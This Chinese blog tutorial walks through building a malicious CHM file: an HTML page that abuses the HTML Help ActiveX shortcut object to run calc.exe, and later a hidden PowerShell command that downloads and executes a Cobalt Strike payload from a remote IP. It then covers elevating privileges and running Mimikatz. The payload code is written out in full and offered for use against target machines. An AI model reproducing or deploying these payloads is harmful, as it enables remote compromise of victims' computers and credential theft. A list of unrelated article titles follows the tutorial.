一、命令执行(calc)木马生成

1.生成木马

首先创建一个根目录,文件名为exp

在文件夹里创建两个目录和一个index.html文件

在两个目录里分别创建txt文件或html文件



index.html写入以下内容

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>

command exec

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

<PARAM name="Command" value="ShortCut">

 <PARAM name="Button" value="Bitmap::shortcut">

 <PARAM name="Item1" value=',calc.exe'>

 <PARAM name="Item2" value="273,1,1">

</OBJECT>

<SCRIPT>

x.Click();

</SCRIPT>

</body></html>



启动EasyCHM软件,点击新建



点击浏览



选择exp文件夹,点确定

点击工具栏的编译按钮



弹出对话框,点击生成CHM,会在桌面生成一个CHM文件



2.测试

把文件放到目标机器,运行,成功弹出计算器

二、power shell 反向HTTP连接 木马生成

1.启动Colbalt Strike

新建一个payload,点击Cobalt Strike --> Listeners



点击Add



填好Name Host Port,点击save

2.生成木马

点击菜单 attacks --> web Drive by --> scripted web Delovery



type类型设置powershell 单机launch



生成结果



用代码将index.html中的calc.exea替换

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>

command exec

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

<PARAM name="Command" value="ShortCut">

 <PARAM name="Button" value="Bitmap::shortcut">

 <PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.60.250.229:80/a'))">

 <PARAM name="Item2" value="273,1,1">

</OBJECT>

<SCRIPT>

x.Click();

</SCRIPT>

</body></html>

  • 需要将原有的单引号换成双引号
  • powershell 后面加入逗号
  • IEX前面和对应的双引号删除
  • 网址换成单引号

3.测试

编译生成,运行如下

三、提权。

在要提权的shell右键点击Access --> Elevate

然后再点击 Access --> Run Minmikatz

成功反弹。

最新文章

  1. ROS学习(三)—— ROS文件系统
  2. ++i vs i++
  3. Unity UI on the HoloLens
  4. WEBAPI 怎么保证安全
  5. 无废话Android之listview入门,自定义的数据适配器、采用layoutInflater打气筒创建一个view对象、常用数据适配器ArrayAdapter、SimpleAdapter、使用ContentProvider(内容提供者)共享数据、短信的备份、插入一条记录到系统短信应用(3)
  6. 不定义JQuery插件,不要说会JQuery
  7. JAVA bean与XML互转的利器---XStream
  8. VMWare ESX Server
  9. C# winform 窗体弹出选择目录或文件 的对话框
  10. java结构与算法之冒泡排序
  11. Zookeeper理解
  12. R语言入门(一)简介安装
  13. this指针随笔
  14. LINUX新建和增加SWAP分区
  15. C# Note18: 使用wpf制作about dialog(关于对话框)
  16. leveldb 学习记录(五)SSTable格式介绍
  17. 导入javax.servlet。伺服登记无法解决:The import javax.servlet.MultipartConfigElement cannot be resolved
  18. IDEA上传一个项目到github
  19. jquery不能实时获取CKEDITOR值的解决方法
  20. linux下C获取系统时间的方法

热门文章

  1. 面向过程编程+模块&amp;导入
  2. Linux源码编译安装php7.2
  3. c++ 拷贝构造函数、拷贝运算符、析构函数
  4. Spring boot 项目中put提交Date数据时出现type=Bad Request, status=400状态码
  5. Android SugarORM(2)
  6. python-jsonpath模块
  7. CobaltStrike逆向学习系列(14):CS功能分析-DotNet
  8. 2020年最为典型的BI工具有哪些?
  9. c# 编程学习(四)
  10. WPF中TreeView控件数据绑定和后台动态添加数据(一)